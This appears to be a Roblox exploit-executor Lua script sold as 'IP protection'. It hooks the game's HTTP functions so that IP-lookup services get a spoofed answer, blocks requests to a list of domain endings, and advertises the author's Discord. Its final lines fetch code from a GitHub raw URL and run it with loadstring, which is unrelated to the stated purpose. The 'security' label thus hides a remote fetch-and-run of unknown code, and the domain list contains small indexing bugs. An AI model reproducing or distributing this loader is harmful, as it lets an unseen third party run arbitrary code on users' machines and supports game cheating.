-- Made by ArasOfficial#8439

getgenv().IpProtection = true
spoofedIP = "Blocked by Security. DM to ArasOfficial#8439 to get Security."


IP_Trackers = {
	"https://v4.ident.me",
	"https://v4.ident.me/",
	"https://api.ipify.org",
	"https://api.ipify.org/",
	"https://httpbin.org/get"
}

local bad = {};

bad[1] = ".link/"
bad[2] = ".pics/"
bad[3] = ".club/"
bad[4] = ".lol/"
bad[5] = ".shop/"
bad[6] = ".bar/"
bad[7] = ".quest/"
bad[8] = ".guru/"
bad[9] = ".life/"
bad[9] = ".monster/"
bad[10] = ".best/"
bad[11] = ".me/"
bad[12] = "thing.com/"
bad[13] = ".fun/"
bad[14] = ".site/"
bad[15] = ".space/"
bad[16] = ".co/"
bad[17] = ".ly/"
bad[19] = ".xyz/"
bad[20] = ".ga/"
bad[21] = ".tk/"
bad[22] = ".gq/"
bad[23] = ".io/"

local old
old = hookfunction(game.HttpGet, function(self, url)
	-- Checking if the protection is enabled
	if type(url) == "string" and getgenv().IpProtection then
		-- Checks if the URL is in the IP_Trackers table
		if table.find(IP_Trackers, url) then
			warn(url,"tried to log your IP. It was protected.")
			return spoofedIP -- Spoofed IP
		end
	end
	return old(self, url)
end)

local oldSyn
oldSyn = hookfunction((syn and syn.request or request),function(a,b)
	if type(a) == "table" and getgenv().IpProtection then
		for i,v in pairs(a) do
			if i == "Url" and table.find(IP_Trackers, v) then
				warn(v,"tried to log your IP. It was protected.")
				return {
					StatusCode = 200,
					Body = spoofedIP
				}
			end
		end
	end
	return oldSyn(a,b)
end)


getgenv().script = function()
	local g
	g = hookfunction(game.HttpGetAsync,function(self,url,...)
		for i,v in pairs(bad) do
			if string.find(url,v) ~= nil then
				print("Link = " .. url)
				print("Detected url ending with " .. v)
				error("Blocked Suspicious Http Request")
			elseif string.find(url,"https") == nil then
				error("Unsecure Http Request")
			end
		end
		return g(self,url,...)
	end)
end
local secure=loadstring(game:HttpGet("https://raw.githubusercontent.com/yenil140/AES/main/AES_Execute"))()
secure.runscript("getgenv().script()")
